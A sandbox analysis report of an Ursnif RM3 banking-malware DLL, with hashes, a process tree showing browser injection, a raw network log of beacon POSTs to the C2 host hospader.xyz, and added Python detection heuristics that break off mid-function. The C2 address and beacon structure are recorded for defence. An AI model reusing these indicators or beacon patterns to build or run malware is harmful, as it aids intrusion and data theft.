Analysis

  • max time kernel: 146s
  • max time network: 145s
  • platform: windows7_x64
  • resource: win7v20201028
  • submitted: 23/12/2020, 12:40 UTC

General

  • Target: b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll
  • Size: 233KB
  • MD5: 68cf96f4bc91628e22e1526d9728990b
  • SHA1: a1e1063ec8c3667e86e1afab81cb6bbea84485b3
  • SHA256: 790191b70550856b3e8ec108fdb82cd8d852822d6716ec865f21cfb5ad160b7c
  • SHA512: ca6bb734df8bf35a2f3346ff5ad954ecc058a719b0eabf90d8c323b80ed6b8659cef5b5f51f65b149c48435bc396920549a72471b0cde1d70a02bf59dbf37b24

Malware Config

Signatures

  • Ursnif RM3: a heavily modified version of Ursnif discovered in the wild.
  • Blocklisted process makes network request (1 IoC)
  • Modifies Internet Explorer settings (1 TTP, 198 IoCs)
  • Suspicious use of FindShellTrayWindow (8 IoCs)
  • Suspicious use of SetWindowsHookEx (32 IoCs)
  • Suspicious use of WriteProcessMemory (39 IoCs)

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll,#1
      2⤵
      • Blocklisted process makes network request
      PID:2004
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:836
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1248 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1492
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1020
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:832
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:832 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1320
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:892
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1812
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:480
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:480 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:344
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:884
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1908
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1000
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1000 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1068
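
One way to turn the process tree above into detection logic, as an added example that is not part of the tria.ge report or of any vendor tool. The event list is hand-transcribed from the Processes section (PIDs, image paths, command lines and the behaviour tags the sandbox attached; parent links follow the report's nesting, so the top-level iexplore.exe instances have no parent, and the per-child variation in the "Modifies Internet Explorer settings" tag is dropped). The field names, the three heuristics and the threshold in `triage` are assumptions of mine.

```python
"""Process-tree heuristics for the rundll32 -> iexplore chain shown in the report.

Constructed input: PROCESSES is transcribed from the Processes section above.
Parent PIDs follow the report's nesting; the top-level iexplore.exe instances
have no visible parent there, so parent=None.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent: Optional[int]          # None = top of its tree in the report
    tags: Tuple[str, ...] = ()     # behaviour tags the sandbox attached


RUNDLL_CMD = (r"rundll32.exe C:\Users\Admin\AppData\Local\Temp"
              r"\b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll,#1")
PROCESSES: List[Proc] = [
    Proc(1096, r"C:\Windows\system32\rundll32.exe", RUNDLL_CMD, None,
         ("WriteProcessMemory",)),
    Proc(2004, r"C:\Windows\SysWOW64\rundll32.exe", RUNDLL_CMD, 1096,
         ("NetworkRequest",)),
]
# Eight identical iexplore.exe pairs: a top-level "-Embedding" instance whose tags
# include WriteProcessMemory, and its 32-bit content process (SCODEF:<parent>).
for parent_pid, child_pid in [(808, 836), (1248, 1492), (1596, 1020), (832, 1320),
                              (892, 1812), (480, 344), (884, 1908), (1000, 1068)]:
    PROCESSES.append(Proc(
        parent_pid, r"C:\Program Files\Internet Explorer\iexplore.exe",
        r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding', None,
        ("IESettings", "FindShellTrayWindow", "SetWindowsHookEx", "WriteProcessMemory")))
    PROCESSES.append(Proc(
        child_pid, r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
        r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" '
        f"SCODEF:{parent_pid} CREDAT:275457 /prefetch:2", parent_pid,
        ("SetWindowsHookEx",)))

ORDINAL_LOAD = re.compile(r"rundll32\.exe\s+(?P<dll>[^,\s]+?\.dll),#\d+", re.I)
USER_TEMP = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)


def ordinal_temp_loads(procs: List[Proc]) -> List[int]:
    """rundll32 calling a DLL export by ordinal (",#N") from a user temp directory.
    Legitimate rundll32 use names the export and loads from System32/Program Files,
    so the two properties together are a cheap, strong signal."""
    hits = []
    for p in procs:
        m = ORDINAL_LOAD.search(p.cmdline)
        if m and USER_TEMP.search(m.group("dll")):
            hits.append(p.pid)
    return hits


def wow64_rehosts(procs: List[Proc]) -> List[Tuple[int, int]]:
    """64-bit rundll32 re-launching the identical command line through SysWOW64:
    the DLL is 32-bit and the loader handed it to the 32-bit host."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.parent) if p.parent is not None else None
        if (parent is not None
                and parent.image.lower().endswith(r"\system32\rundll32.exe")
                and p.image.lower().endswith(r"\syswow64\rundll32.exe")
                and parent.cmdline.lower() == p.cmdline.lower()):
            hits.append((parent.pid, p.pid))
    return hits


def orphan_embedding_browsers(procs: List[Proc]) -> List[int]:
    """iexplore.exe started with -Embedding (COM activation, not a user click),
    with no parent in the tree, that is itself writing into other processes."""
    return [p.pid for p in procs
            if p.image.lower().endswith(r"\iexplore.exe")
            and "-embedding" in p.cmdline.lower()
            and p.parent is None
            and "WriteProcessMemory" in p.tags]


def triage(procs: List[Proc], ie_threshold: int = 3) -> dict:
    """Combine the signals; ie_threshold is an assumed value, not a tria.ge one."""
    findings = {
        "ordinal_temp_load": ordinal_temp_loads(procs),
        "wow64_rehost": wow64_rehosts(procs),
        "rundll32_network": [p.pid for p in procs
                             if "rundll32" in p.image.lower() and "NetworkRequest" in p.tags],
        "orphan_ie_embedding": orphan_embedding_browsers(procs),
    }
    injected = len(findings["orphan_ie_embedding"]) >= ie_threshold
    findings["verdict"] = ("likely loader + browser injection"
                           if findings["ordinal_temp_load"] and findings["wow64_rehost"]
                           and findings["rundll32_network"] and injected
                           else "inconclusive")
    return findings


if __name__ == "__main__":
    for key, value in triage(PROCESSES).items():
        print(f"{key}: {value}")
```

The three checks are deliberately independent: the ordinal-load check fires on the first rundll32 alone, the SysWOW64 re-host ties the two rundll32 instances together, and the orphan-IE check counts browser hosts that were COM-activated rather than launched by a user and that carry a WriteProcessMemory tag. Eight such hosts inside a 146 second run is what lifts the verdict; a single IE instance behaving this way is not enough on its own and the threshold should be tuned to the telemetry source.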

Network

  • DNS go.microsoft.com
    Remote address: 8.8.8.8:53
    Request: go.microsoft.com IN A
    Response:
      go.microsoft.com IN CNAME go.microsoft.com.edgekey.net
      go.microsoft.com.edgekey.net IN CNAME e11290.dspg.akamaiedge.net
      e11290.dspg.akamaiedge.net IN A 23.206.90.201
  • DNS hospader.xyz
    Remote address: 8.8.8.8:53
    Request: hospader.xyz IN A
    Response:
      hospader.xyz IN A 45.142.212.128
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=a0299c9ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 778
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS crl.identrust.com
    Remote address: 8.8.8.8:53
    Request: crl.identrust.com IN A
    Response:
      crl.identrust.com IN CNAME identrust.edgesuite.net
      identrust.edgesuite.net IN CNAME a1952.dscq.akamai.net
      a1952.dscq.akamai.net IN A 95.100.96.201
      a1952.dscq.akamai.net IN A 95.100.96.232
  • DNS crl.identrust.com
    Remote address: 8.8.8.8:53
    Request: crl.identrust.com IN A
    Response:
      crl.identrust.com IN CNAME identrust.edgesuite.net
      identrust.edgesuite.net IN CNAME a1952.dscq.akamai.net
      a1952.dscq.akamai.net IN A 95.100.96.232
      a1952.dscq.akamai.net IN A 95.100.96.201
  • GET http://crl.identrust.com/DSTROOTCAX3CRL.crl (IEXPLORE.EXE)
    Remote address: 95.100.96.232:80
    Request
    GET /DSTROOTCAX3CRL.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.identrust.com
    Response
    HTTP/1.1 200 OK
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Last-Modified: Wed, 09 Dec 2020 20:58:58 GMT
    ETag: "4a6-5b60e53f64880"
    Accept-Ranges: bytes
    Content-Length: 1190
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Type: application/pkix-crl
    Cache-Control: max-age=3600
    Expires: Wed, 23 Dec 2020 13:41:10 GMT
    Date: Wed, 23 Dec 2020 12:41:10 GMT
    Connection: keep-alive
  • GET http://crl.identrust.com/DSTROOTCAX3CRL.crl (IEXPLORE.EXE)
    Remote address: 95.100.96.201:80
    Request
    GET /DSTROOTCAX3CRL.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.identrust.com
    Response
    HTTP/1.1 200 OK
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Last-Modified: Wed, 09 Dec 2020 20:58:58 GMT
    ETag: "4a6-5b60e53f64880"
    Accept-Ranges: bytes
    Content-Length: 1190
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Type: application/pkix-crl
    Cache-Control: max-age=3600
    Expires: Wed, 23 Dec 2020 13:41:10 GMT
    Date: Wed, 23 Dec 2020 12:41:10 GMT
    Connection: keep-alive
  • POST https://hospader.xyz/index.htm (rundll32.exe)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=95d504fffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 791
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • POST https://hospader.xyz/index.htm (rundll32.exe)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=8f08f7dffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 783
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • POST https://hospader.xyz/index.htm (rundll32.exe)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=71397f9ffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 791
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS crl.verisign.com
    Remote address: 8.8.8.8:53
    Request: crl.verisign.com IN A
    Response:
      crl.verisign.com IN CNAME crl-symcprod.digicert.com
      crl-symcprod.digicert.com IN CNAME cs9.wac.phicdn.net
      cs9.wac.phicdn.net IN A 72.21.91.29
  • DNS go.microsoft.com
    Remote address: 8.8.8.8:53
    Request: go.microsoft.com IN A
    Response:
      go.microsoft.com IN CNAME go.microsoft.com.edgekey.net
      go.microsoft.com.edgekey.net IN CNAME e11290.dspg.akamaiedge.net
      e11290.dspg.akamaiedge.net IN A 23.206.90.201
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=8846703ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 787
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS www.microsoft.com
    Remote address: 8.8.8.8:53
    Request: www.microsoft.com IN A
    Response:
      www.microsoft.com IN CNAME www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net IN CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net IN CNAME e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net IN A 2.21.41.70
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=8098407ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 789
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS go.microsoft.com
    Remote address: 8.8.8.8:53
    Request: go.microsoft.com IN A
    Response:
      go.microsoft.com IN CNAME go.microsoft.com.edgekey.net
      go.microsoft.com.edgekey.net IN CNAME e11290.dspg.akamaiedge.net
      e11290.dspg.akamaiedge.net IN A 23.206.90.201
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=78e54dfffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 793
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS go.microsoft.com
    Remote address: 8.8.8.8:53
    Request: go.microsoft.com IN A
    Response:
      go.microsoft.com IN CNAME go.microsoft.com.edgekey.net
      go.microsoft.com.edgekey.net IN CNAME e11290.dspg.akamaiedge.net
      e11290.dspg.akamaiedge.net IN A 23.206.90.201
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=6a8a02fffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 782
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=62de349ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 784
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • DNS go.microsoft.com
    Remote address: 8.8.8.8:53
    Request: go.microsoft.com IN A
    Response:
      go.microsoft.com IN CNAME go.microsoft.com.edgekey.net
      go.microsoft.com.edgekey.net IN CNAME e11290.dspg.akamaiedge.net
      e11290.dspg.akamaiedge.net IN A 23.206.90.201
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=5b32663ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 772
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:43:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • POST https://hospader.xyz/index.htm (IEXPLORE.EXE)
    Remote address: 45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=53203cbffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 776
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:43:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  Connections (remote, name, protocols, process, bytes out, bytes in, packets out, packets in, transactions):

  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  4.3kB  10   8  POST /index.htm -> 404
  45.142.212.128:443  hospader.xyz                                 tls        IEXPLORE.EXE  645 B  3.8kB   7   6  -
  95.100.96.232:80    http://crl.identrust.com/DSTROOTCAX3CRL.crl  http       IEXPLORE.EXE  365 B  1.9kB   5   4  GET /DSTROOTCAX3CRL.crl -> 200
  95.100.96.201:80    http://crl.identrust.com/DSTROOTCAX3CRL.crl  http       IEXPLORE.EXE  365 B  1.9kB   5   4  GET /DSTROOTCAX3CRL.crl -> 200
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  rundll32.exe  4.5kB  6.5kB  14  14  POST /index.htm -> 404 (x3)
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.1kB  5.0kB  12  10  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  4.3kB  10   8  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  4.9kB   9   9  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  5.0kB  10  10  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  4.9kB   9   9  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  5.0kB  10  10  POST /index.htm -> 404
  45.142.212.128:443  https://hospader.xyz/index.htm               tls, http  IEXPLORE.EXE  2.0kB  4.3kB  10   8  POST /index.htm -> 404
  8.8.8.8:53          go.microsoft.com                             dns        -              62 B  157 B   1   1  A -> 23.206.90.201
  8.8.8.8:53          hospader.xyz                                 dns        -              58 B   74 B   1   1  A -> 45.142.212.128
  8.8.8.8:53          crl.identrust.com                            dns        -              63 B  164 B   1   1  A -> 95.100.96.232, 95.100.96.201
  8.8.8.8:53          crl.identrust.com                            dns        -              63 B  164 B   1   1  A -> 95.100.96.201, 95.100.96.232
  8.8.8.8:53          crl.verisign.com                             dns        -              62 B  146 B   1   1  A -> 72.21.91.29
  8.8.8.8:53          go.microsoft.com                             dns        -              62 B  157 B   1   1  A -> 23.206.90.201
  8.8.8.8:53          www.microsoft.com                            dns        -              63 B  230 B   1   1  A -> 2.21.41.70
  8.8.8.8:53          go.microsoft.com                             dns        -              62 B  157 B   1   1  A -> 23.206.90.201
  8.8.8.8:53          go.microsoft.com                             dns        -              62 B  157 B   1   1  A -> 23.206.90.201
  8.8.8.8:53          go.microsoft.com                             dns        -              62 B  157 B   1   1  A -> 23.206.90.201
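
A beacon-analysis pass over the eleven POSTs to hospader.xyz listed above, as an added example that is not tria.ge code. EVENTS is transcribed from the Network section (the server's response Date as the timestamp, since the report gives no client clock; requesting process; multipart boundary; Content-Length; User-Agent; request header order). The functions, the field layout and every threshold in `beacon_report` are assumptions of mine.

```python
"""Beacon analysis over the POST https://hospader.xyz/index.htm events in the report.

Constructed input: EVENTS is transcribed from the report's Network section.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, Sequence, Tuple

IE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
X64_UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
# Request header order as captured; the rundll32 path sends no Accept* headers.
IE_HDRS = ("Accept", "Content-Type", "Accept-Language", "User-Agent",
           "Accept-Encoding", "Host", "Content-Length", "Connection", "Cache-Control")
DLL_HDRS = ("Cache-Control", "Connection", "Pragma", "Content-Type",
            "User-Agent", "Content-Length", "Host")

# (response Date, process, multipart boundary, Content-Length, User-Agent, header order)
Event = Tuple[str, str, str, int, str, Tuple[str, ...]]
EVENTS: List[Event] = [
    ("12:41:11", "IEXPLORE.EXE", "a0299c9ffe2926d7", 778, IE_UA, IE_HDRS),
    ("12:41:24", "rundll32.exe", "95d504fffe2926d7", 791, X64_UA, DLL_HDRS),
    ("12:41:35", "rundll32.exe", "8f08f7dffe2926d7", 783, X64_UA, DLL_HDRS),
    ("12:41:48", "IEXPLORE.EXE", "8846703ffe2926d7", 787, IE_UA, IE_HDRS),
    ("12:42:00", "IEXPLORE.EXE", "8098407ffe2926d7", 789, IE_UA, IE_HDRS),
    ("12:42:13", "IEXPLORE.EXE", "78e54dfffe2926d7", 793, IE_UA, IE_HDRS),
    ("12:42:25", "rundll32.exe", "71397f9ffe2926d7", 791, X64_UA, DLL_HDRS),
    ("12:42:37", "IEXPLORE.EXE", "6a8a02fffe2926d7", 782, IE_UA, IE_HDRS),
    ("12:42:50", "IEXPLORE.EXE", "62de349ffe2926d7", 784, IE_UA, IE_HDRS),
    ("12:43:03", "IEXPLORE.EXE", "5b32663ffe2926d7", 772, IE_UA, IE_HDRS),
    ("12:43:17", "IEXPLORE.EXE", "53203cbffe2926d7", 776, IE_UA, IE_HDRS),
]


def common_suffix(strings: Sequence[str]) -> str:
    """Longest suffix shared by every string."""
    suffix = strings[0] if strings else ""
    for s in strings[1:]:
        while not s.endswith(suffix):
            suffix = suffix[1:]
    return suffix


def boundary_signature(events: Sequence[Event]) -> dict:
    """Browsers randomise the whole multipart boundary; a tail that never changes
    across requests is a per-sample constant worth pivoting on."""
    bounds = [e[2] for e in events]
    tail = common_suffix(bounds)
    prefixes = {b[: len(b) - len(tail)] for b in bounds}
    return {"constant_tail": tail,
            "variable_prefix_len": len(bounds[0]) - len(tail),
            "all_prefixes_unique": len(prefixes) == len(bounds)}


def intervals_by_process(events: Sequence[Event]) -> Dict[str, dict]:
    """Seconds between consecutive POSTs, per requesting process."""
    stamps: Dict[str, List[datetime]] = defaultdict(list)
    for ts, proc, *_ in events:
        stamps[proc].append(datetime.strptime(ts, "%H:%M:%S"))
    out = {}
    for proc, ts_list in stamps.items():
        ts_list.sort()
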